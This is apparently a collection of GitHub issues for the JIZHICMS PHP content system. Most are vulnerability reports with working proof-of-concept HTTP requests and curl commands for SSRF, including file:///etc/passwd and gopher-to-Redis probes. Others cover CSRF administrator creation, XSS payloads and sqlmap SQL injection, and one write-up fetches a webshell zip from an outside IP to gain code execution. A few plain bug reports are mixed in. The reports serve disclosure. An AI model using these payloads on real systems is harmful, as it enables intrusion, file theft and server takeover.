极致CMS(以下简称:JIZHICMS)是一款开源免费,无商业授权的建站系统。
Home Page: https://www.jizhicms.cn
License: MIT License
I'm a PHP backend developer who can also create simple front-end pages. I'm capable of independently completing small to medium-sized projects.
I'm looking forward to connecting with new friends on GitHub. Feel free to reach out to me at 📧 [email protected].
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: 2.2.5
Test with PHP 7.2
The vulnerable code is located in the update function of the app/admin/c/TemplateController.php file, which fails to validate the download_url parameter, causing a taint flow from the source $remote_url variable into the sink function curl_init , which, after the curl_exec function is executed, a request is sent to the URL specified by the download_url parameter, which eventually leads to an SSRF vulnerability.
function update(){
$template = $this->frparam('template',1);
if(strpos($template,'.')!==false){
JsonReturn(array('code'=>1,'msg'=>JZLANG('参数存在安全隐患!')));
}
$this->template_name = $template;
$dir = APP_PATH.'static';
if($template){
if($this->frparam('action',1)){
$action = $this->frparam('action',1);
// 自己获取这些信息
$remote_url = urldecode($this->frparam('download_url',1));
$remote_url = strpos($remote_url,'?')!==false ? $remote_url.'&version='.$this->webconf['web_version'] : $remote_url.'?version='.$this->webconf['web_version'];
$file_size = $this->frparam('filesize',1);
$tmp_path = Cache_Path."/update_".$filepath.".zip";//临时下载文件路径
switch ($action) {
case 'prepare-download':
$code = 0;
ob_start();
$ch=curl_init($remote_url);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_NOBODY,1);
$okay=curl_exec($ch);
curl_close($ch);
$head=ob_get_contents();
ob_end_clean();
$regex='/Content-Length:\s([0-9].+?)\s/';
$count=preg_match($regex,$head,$matches);
$filesize = isset($matches[1])&&is_numeric($matches[1])?$matches[1]:0;
JsonReturn(array('code'=>0,'size'=>$filesize));
break;Since the download_url parameter is not restricted, it is also possible to use the server-side to send requests, for example, to probe the intranet web service. The corresponding PoC is as follows:
POST /index.php/admins/Template/update.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
Connection: close
action=prepare-download&template=cms&download_url=http://localhost/tmppoc
You can also use the following curl command to verify the vulnerability.
curl -i -s -k -X $'POST' \
-H $'Host: 172.16.119.130' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' -H $'Content-Length: 73' \
-b $'think_var=zh-cn; PHPSESSID=g3e5nupqb19trokgr9msul8d9l' \
--data-binary $'action=prepare-download&template=cms&download_url=http://localhost/tmppoc' \
$'http://172.16.119.130/index.php/admins/Template/update.html'We can then see the corresponding request in the apache server logs, which proves that the SSRF vulnerability can be triggered.
安装完以后点进入后台没反应
访问 /admin , /admin.php
都是显示404
这个在nginx 下,没有重写规则啥的吗?
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: 2.2.5
Test with PHP 7.2
The vulnerable code is located in the update function of the app/admin/c/PluginsController.php file, which fails to validate the download_url parameter, causing a taint flow from the source $remote_url variable into the sink function curl_init , which, after the curl_exec function is executed, a request is sent to the URL specified by the download_url parameter, which eventually leads to an SSRF vulnerability.
function update(){
$filepath = $this->frparam('filepath',1);
if(strpos($filepath,'.')!==false){
JsonReturn(array('code'=>1,'msg'=>'参数存在安全隐患!'));
}
if($filepath){
if($this->frparam('action',1)){
$action = $this->frparam('action',1);
// 自己获取这些信息
$remote_url = urldecode($this->frparam('download_url',1));
$remote_url = strpos($remote_url,'?')!==false ? $remote_url.'&version='.$this->webconf['web_version'] : $remote_url.'?version='.$this->webconf['web_version'];
$file_size = $this->frparam('filesize',1);
$tmp_path = Cache_Path."/update_".$filepath.".zip";//临时下载文件路径
switch ($action) {
case 'prepare-download':
$code = 0;
ob_start();
$ch=curl_init($remote_url);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_NOBODY,1);
$okay=curl_exec($ch);
curl_close($ch);
$head=ob_get_contents();
ob_end_clean();
$regex='/Content-Length:\s([0-9].+?)\s/';
$count=preg_match($regex,$head,$matches);
$filesize = isset($matches[1])&&is_numeric($matches[1])?$matches[1]:0;
JsonReturn(array('code'=>0,'size'=>$filesize));Since this interface returns the size of the read file, it can be used to detect whether a local file exists. The corresponding PoC is as follows:
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 72
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=eb1cdd5882a1d84173f03d55; think_var=zh-cn
Connection: close
action=prepare-download&filepath=apidata&download_url=file:///etc/passwd
If the detected file does not exist, the parameter size value in the response body is 0.
Since the download_url parameter is not restricted, it is also possible to use the server-side to send requests, for example, to probe the intranet web service. The corresponding PoC is as follows:
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 78
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=eb1cdd5882a1d84173f03d55; think_var=zh-cn
Connection: close
action=prepare-download&filepath=apidata&download_url=http://localhost/poctest
In the apache server logs, we can see that the server-side application helped us send a request to the local 127.0.0.1 IP.
Because the curl function supports the gopher protocol, if the Redis service deploys in the intranet, it is possible to exploit the vulnerability associated with the Redis service to control the server. The corresponding PoC is as follows:
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 83
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=eb1cdd5882a1d84173f03d55; think_var=zh-cn
Connection: close
action=prepare-download&filepath=apidata&download_url=gopher://localhost:6379/_info
Fix recommendation: it is recommended to use regular expressions to restrict the input in order to prevent attackers from abusing the functionality there
After the administrator logged in, open the following page
poc:
test.html--Add administrator account
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/admin.php/Admin/adminadd.html" method="POST">
<input type="hidden" name="name" value="asd222" />
<input type="hidden" name="tel" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="gid" value="1" />
<input type="hidden" name="pass" value="asd222" />
<input type="hidden" name="repass" value="asd222" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="go" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
You can successfully add the administrator account - asd222/asd222
Find the "Edit Template Online" plugin in the "Plugin Management" section of the backend administration, and proceed to install it.
Turn on the switch for the plugin and configure it.
Then enter the file management interface.
Open the index.php file, then add the webshell malicious code.
Open the webshell management tool, enter the URL of the webshell and the corresponding connection password to connect.
Successful connection.
A xss vulnerability was discovered in jizhicms 1.7.1
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of /index.php/Error/index?msg=1
Vulnerability file: Home/c/ErrorController.php
class ErrorController extends Controller
{
//错误处理示例
function index($msg){
echo '错误信息提示:<br/>';
echo $msg;
}
}PoC:
http://example.com/index.php/Error/index?msg=%3Cscript%3Ealert(1)%3C/script%3E
Vulnerability recurrence:
Such as:
You can see that this request was returned on the VPS
Vulnerability analysis:
In the update method in the file located at app/admin/c/PluginsController.php, $remote_url does not perform a security check on the url, which allows any zip file to be downloaded remotely and decompressed as can be seen in the code behind.
According to the code on line 719, we can know that the downloaded and decompressed file is stored under app/admin/exts
SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks
The vulnerability is located in the background plug-in download function
I start a locally accessible Web service with a flag.php file
use payload
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.48.135
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.48.135
Referer: http://192.168.48.135//admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=821f3d50fa8cd84139c76be9
Connection: close
action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.phpSee the response
Browser accesshttp://192.168.48.135/cache/update_mutisite.zip
open by notepad
As with flag.php, this was read successfully
JIZHICMS 1.5.1 allows XSS to add an administrator cookie.
New normal account => New articles
code:
<script>alert(1)</script>
Go to administrator background
Click on the title to trigger XSS
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: 2.2.5
Test with PHP 7.2
The vulnerable code is located in the update function of the app/admin/c/TemplateController.php file, which fails to validate the download_url parameter, causing a taint flow from the source $remote_url variable into the sink function fopen. This eventually leads to an SSRF vulnerability that can send a request to the URL specified by the download_url parameter.
function update(){
$template = $this->frparam('template',1);
if(strpos($template,'.')!==false){
JsonReturn(array('code'=>1,'msg'=>JZLANG('参数存在安全隐患!')));
}
$this->template_name = $template;
$dir = APP_PATH.'static';
if($template){
if($this->frparam('action',1)){
$action = $this->frparam('action',1);
// 自己获取这些信息
$remote_url = urldecode($this->frparam('download_url',1));
$remote_url = strpos($remote_url,'?')!==false ? $remote_url.'&version='.$this->webconf['web_version'] : $remote_url.'?version='.$this->webconf['web_version'];
$file_size = $this->frparam('filesize',1);
$tmp_path = Cache_Path."/update_".$filepath.".zip";//临时下载文件路径
switch ($action) {
......
case 'start-download':
// 这里检测下 tmp_path 是否存在
try {
set_time_limit(0);
touch($tmp_path);
if ($fp = fopen($remote_url, "rb")) {
if (!$download_fp = fopen($tmp_path, "wb")) {
exit;
}
while (!feof($fp)) {
if (!file_exists($tmp_path)) {
// 如果临时文件被删除就取消下载
fclose($download_fp);
exit;
}
fwrite($download_fp, fread($fp, 1024 * 8 ), 1024 * 8);
}
fclose($download_fp);
fclose($fp);
} else {
exit;
}
} catch (Exception $e) {
Storage::remove($tmp_path);
JsonReturn(['code'=>1,'msg'=>JZLANG('发生错误').':'.$e->getMessage()]);
}
JsonReturn(['code'=>0,'tmp_path'=>$tmp_path]);
break;Because the download_url parameter is not restricted, it is also possible to use the server-side to send requests, such as probing intranet web services. The corresponding PoC is as follows:
POST /index.php/admins/Template/update.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
Connection: close
action=start-download&template=cms&download_url=http://localhost/startpoc
You can also use the following curl command to verify the vulnerability
curl -i -s -k -X $'POST' \
-H $'Host: 172.16.119.130' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' -H $'Content-Length: 73' \
-b $'think_var=zh-cn; PHPSESSID=g3e5nupqb19trokgr9msul8d9l' \
--data-binary $'action=start-download&template=cms&download_url=http://localhost/startpoc' \
$'http://172.16.119.130/index.php/admins/Template/update.html'
We can then see the corresponding request in the apache server logs, which proves that the SSRF vulnerability can be triggered
This is one of my favorite CMS, but I found a system vulnerability.
name:jizhicms
version: v2.3.3
Installation package download:
Problematic packets:
POST /index.php/admins/Fields/get_fields.html HTTP/1.1
Host: 192.168.23.130:49158
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://192.168.23.130:49158
Connection: close
Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html
Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rsmolds=tags&tid=0&id=1
Background ->SEO settings ->TGA list ->edit, and then capture packages
Vulnerability verification exists
payload
Parameter: molds (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3
祝愿Jizhicms越做越好!
在前台文章评论处评论"><img src=1 onerror=alert(1)>
管理员后台查看评论可触发xss
在文章标题写入:'"><iMg SrC=x OnErRoR=alert(1)>{{7*7}}
后台文章管理处:
点击文章标题触发xss:
1.admin login
2.In basic settings->advanced setting
Attacker can add a php suffix.
3.In basic settings->Payment setting
Attacker can upload a php file
4.php Code execution
author:[email protected]
安装完成之后
错误信息提示:
/user/style.html不存在!
{$listpage}变量在前台值为空
自定义分页错误
在Home/c/HomeController.php - line 872
$this->pagelist = $arraypage->listpage;
应改为
$this->listpage = $arraypage->listpage;
Hey there!
I belong to an open source security research community, and a member (@wind226) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
version: v2.3.1
Problematic packets:
POST /index.php/admins/Fields/get_fields.html HTTP/1.1
Host: 192.168.10.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.130/index.php/admins/Comment/editcomment/id/3.html
Content-Length: 24
Cookie: language=en-gb; currency=USD; PHPSESSID=67c4b6e9ea40f3030a8987fcb94be158
Connection: close
molds=comment&tid=0&id=3
backstage->Interactive Management - > comment list, and grab a package
use sqlmap: sqlmap -r test.txt --level 3 --random-agent --batch
---
Parameter: molds (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: molds=comment;SELECT SLEEP(5)#&tid=0&id=3
---
SQL injection vulnerabilities exist under the function nodes of new members, and attackers can operate on databases
Problematic packets:
POST /index.php/admins/Member/memberedit.html HTTP/1.1
Host: 192.168.150.136:85
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 241
Origin: http://192.168.150.136:85
Connection: close
Referer: http://192.168.150.136:85/index.php/admins/Member/memberedit/id/1163.html
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1665907862; PHPSESSID=k7nc070b0c4h2f1kjo65l54aqf
go=1&id=1163&username=xxxx&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=®time=2022-10-19+19%3A34%3A02&logintime=2022-10-19+19%3A24%3A17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
use sqlmap: python2 sqlmap.py -r ss.txt --batch -current-db
---
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: go=1&id=1163' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))lPDg) AND 'fgEo'='fgEo&username=xxxx#&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=®time=2022-10-19 19:34:02&logintime=2022-10-19 19:24:17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
---
在添加多附件字段后,无法上传非图片的文件。
问题原因
文件A/c/FieldsController.php
->line 790
,accept:"images"
->line 792
,acceptMime:"image/*"
改写为
,accept:"file"
,acceptMime:"*"
SELECT SQL_CALC_FOUND_ROWS * FROM jz_classtype WHERE isshow=1 and (tid in (1) or tids like '%,1,%' ) ORDER BY orders desc,addtime desc,id desc LIMIT 10
Fatal error: Uncaught PDOException: SQLSTATE[42S22]: Column not found: 1054 Unknown column 'tid' in 'where clause' in /www/wwwroot/peso.net/frphp/db/DBholder.php:57 Stack trace: #0 /www/wwwroot/peso.net/frphp/db/DBholder.php(57): PDO->query() #1 /www/wwwroot/peso.net/frphp/db/DBholder.php(74): frphp\db\DBholder->query() #2 /www/wwwroot/peso.net/frphp/lib/Model.php(264): frphp\db\DBholder->getArray() #3 /www/wwwroot/peso.net/frphp/extend/Page.php(335): frphp\lib\Model->findPage() #4 /www/wwwroot/peso.net/app/home/c/HomeController.php(249): frphp\extend\Page->go() #5 /www/wwwroot/peso.net/frphp/fr.php(335): app\home\c\HomeController->jizhi() #6 /www/wwwroot/peso.net/frphp/fr.php(94): frphp\frphp->route() #7 /www/wwwroot/peso.net/frphp/fr.php(520): frphp\frphp->run() #8 /www/wwwroot/peso.net/index.php(17): require('...') #9 {main} thrown in /www/wwwroot/peso.net/frphp/db/DBholder.php on line 57
极致cms版本 v2.4.5
用的宝塔,php版本7.4下点击筛选中的选项会报错。
报错原因大概率是**/conf/Functions.php:1276 中的unset()在php7.2之后弃用了**。希望能够修改这个地方让他兼容,我试着把变量赋值null,但是筛选不出结果。具体原因就不懂了。把php版本切换成7.0或者5.6都可以正常筛选。
报错如下
Fatal error
: Uncaught Error: Cannot unset string offsets in /www/wwwroot//conf/Functions.php:1276 Stack trace: #0 /www/wwwroot//cache/63aa9f534d633ce917e4280c382bccc5.php(387): change_parse_url() #1 /www/wwwroot//frphp/lib/View.php(127): include('/www/wwwroot/lh...') #2 /www/wwwroot//frphp/lib/View.php(65): frphp\lib\View->template() #3 /www/wwwroot/**/frphp/lib/Controller.php(67): frphp\lib\View->render() #4 /www/wwwroot//app/home/c/ScreenController.php(235): frphp\lib\Controller->display() #5 /www/wwwroot//frphp/fr.php(335): app\home\c\ScreenController->index() #6 /www/wwwroot//frphp/fr.php(94): frphp\frphp->route() #7 /www/wwwroot//frphp/fr.php(520): frphp\frphp->run() #8 /www/wwwroot/*/index.php(17): require('/www/wwwroot/lh...') #9 {main} thrown in
At the URL http://xxx/contact.html , which is a contact page, we could find a 'leave a message' function. Fill the form with a xss payload <img src onerror=_=alert,_(13232)> as showd below and submit it.
Then if we go to the admin page of the cms, we could find the message can be seen in the index of the admin page with a 'reply' button on the bottom right corner.
if we click the 'reply' button, the xss payload will be excuted
version:v2.3.1
The issue in the background - > User Management - > administrator list
add a administrator and grab a package.
use CSRF poc and drop the package.
submit
Super administrator added successfully
首先这里我使用的最新版本的cms
然后这里我先利用PluginsController.php里的update函数进行操作,首先我们创建一个木马压缩包,比较简单的一句话木马
进行压缩,并开启http服务提供下载
利用start-download功能进行下载
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 192.168.1.132
Content-Length: 90
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.132
Referer: http://192.168.1.132/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1667813816; _ga=GA1.1.285813930.1667823442; PHPSESSID=45ilp4m5f6r71r2bktathd9prb
Connection: close
action=start-download&filepath=apidata&download_url=http://42.193.6.219:10001/apidata.zip?
然后我们利用解压功能
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 192.168.1.132
Content-Length: 34
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.132
Referer: http://192.168.1.132/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1667813816; _ga=GA1.1.285813930.1667823442; PHPSESSID=45ilp4m5f6r71r2bktathd9prb
Connection: close
action=file-upzip&filepath=apidata
下面这个get_zip_originalsize会进行解压操作
并且会把我们的木马写到这里去
下面访问木马http://192.168.1.132/app/admin/exts/apidata/test.php?1=phpinfo();
修复建议:
在这里我看到网站提供了下载和解压功能,所以我建议还是不要让用户控制下载的url一遍下载到危险的内容,同时建议可以打开web沙箱进行操作
最近php网站容易出现这种解压带来的问题,所以还是把url写死比较好
安装完毕后,验证码功能无法使用。图片弹不出来
目前已经在window和linux都安装成功,但是验证码功能貌似启用失败。
除此以外,还发现php8部署,会提示/frphp/fr.php中setcookie函数中两个null参数不安全。不过不是本次主要目的(顺口提一句),修复方案是
# 修改前
setcookie('PHPSESSID', $_COOKIE['PHPSESSID'], time() + SessionTime,'/',null,null,true);
# 修改后
setcookie('PHPSESSID', $_COOKIE['PHPSESSID'], time() + SessionTime,'/',‘’,‘’,true);
如果看见,想问问验证码的问题如何修复~
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: 2.2.5
Test with PHP 7.2
The vulnerable code is located in the index function of the app/admin/c/PluginsController.php file, which fails to validate the webapi parameter, leading to a taint introduced from the $webapi variable into the tainted function curl_setopt, and after the curl_exec function is executed, it sends a request to the URL specified by the webapi parameter, eventually leading to an SSRF vulnerability. However, this vulnerability is triggered in two stages, first by passing the set parameter to reset the webapi section of the plugins_config field in sysconfig. The SSRF vulnerability is then triggered when the function is triggered again and without any parameter values.
public function index(){
//检查更新链接是否可以访问
$webapi = $this->webconf['plugins_config'];
if(!$webapi){
$webapi = 'http://api.jizhicms.cn/plugins.php';
if(!M('sysconfig')->find(['field'=>'plugins_config'])){
M('sysconfig')->add(['title'=>JZLANG('插件配置'),'field'=>'plugins_config','type'=>2,'data'=>$webapi,'typeid'=>0]);
setCache('webconfig',null);
}
}
if($this->frparam('set')){
if($this->admin['isadmin']!=1){
JsonReturn(['code'=>1,'msg'=>JZLANG('非超级管理员无法设置!')]);
}
$webapi = $this->frparam('webapi',1);
M('sysconfig')->update(['field'=>'plugins_config'],['data'=>$webapi]);
setCache('webconfig',null);
JsonReturn(['code'=>0,'msg'=>'配置成功!']);
}
$this->webapi = $webapi;
$api = $webapi.'?version='.$this->webconf['web_version'];
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch,CURLOPT_URL,$api);
$res = curl_exec($ch);
$httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);Because the webapi parameters are not limited, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows
PoC stage 1: the value of the webapi to set
POST /index.php/admins/Plugins/index.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
Connection: close
set=1&webapi=http%3A%2F%2F127.0.0.1%2Fwebapipoc.php
You can also use the following curl command to verify the vulnerability as PoC Stage 1
curl -i -s -k -X $'POST' \
-H $'Host: 172.16.119.130' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' -H $'Content-Length: 51' \
-b $'think_var=zh-cn; PHPSESSID=g3e5nupqb19trokgr9msul8d9l' \
--data-binary $'set=1&webapi=http%3A%2F%2F127.0.0.1%2Fwebapipoc.php' \
$'http://172.16.119.130/index.php/admins/Plugins/index.html'
PoC stage 2:
GET /index.php/admins/Plugins/index.html HTTP/1.1
Host: 172.16.119.130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
Connection: close
Eventually we can see the corresponding request in the apache server logs, which proves that the SSRF vulnerability can be triggered
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: 2.2.5
Test with PHP 7.2
The vulnerable code is located in the update function of the app/admin/c/PluginsController.php file, which fails to validate the download_url parameter, causing a taint flow from the source $remote_url variable into the sink function fopen. This eventually leads to an SSRF vulnerability that can send a request to the URL specified by the download_url parameter.
function update(){
$filepath = $this->frparam('filepath',1);
if(strpos($filepath,'.')!==false){
JsonReturn(array('code'=>1,'msg'=>'参数存在安全隐患!'));
}
if($filepath){
if($this->frparam('action',1)){
$action = $this->frparam('action',1);
// 自己获取这些信息
$remote_url = urldecode($this->frparam('download_url',1));
$remote_url = strpos($remote_url,'?')!==false ? $remote_url.'&version='.$this->webconf['web_version'] : $remote_url.'?version='.$this->webconf['web_version'];
$file_size = $this->frparam('filesize',1);
$tmp_path = Cache_Path."/update_".$filepath.".zip";//临时下载文件路径
switch ($action) {
......
case 'start-download':
// 这里检测下 tmp_path 是否存在
try {
set_time_limit(0);
touch($tmp_path);
// 做些日志处理
if ($fp = fopen($remote_url, "rb")) {
if (!$download_fp = fopen($tmp_path, "wb")) {
exit;
}
while (!feof($fp)) {
if (!file_exists($tmp_path)) {
// 如果临时文件被删除就取消下载
fclose($download_fp);
exit;
}
fwrite($download_fp, fread($fp, 1024 * 8 ), 1024 * 8);
}
fclose($download_fp);
fclose($fp);
} else {
exit;
}
} catch (Exception $e) {
Storage::remove($tmp_path);
JsonReturn(['code'=>1,'msg'=>'发生错误:'.$e->getMessage()]);
}Since the download_url parameter is not restricted, it is also possible to use the server-side to send requests, for example, to probe the intranet web service. The corresponding PoC is as follows:
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 172.16.119.130
Content-Length: 76
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.119.130
Referer: http://172.16.119.130/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_var=zh-cn; PHPSESSID=lkbci4j8clqc6de6rhpn9fdk31
Connection: close
action=start-download&filepath=apidata&download_url=http://localhost/testpoc
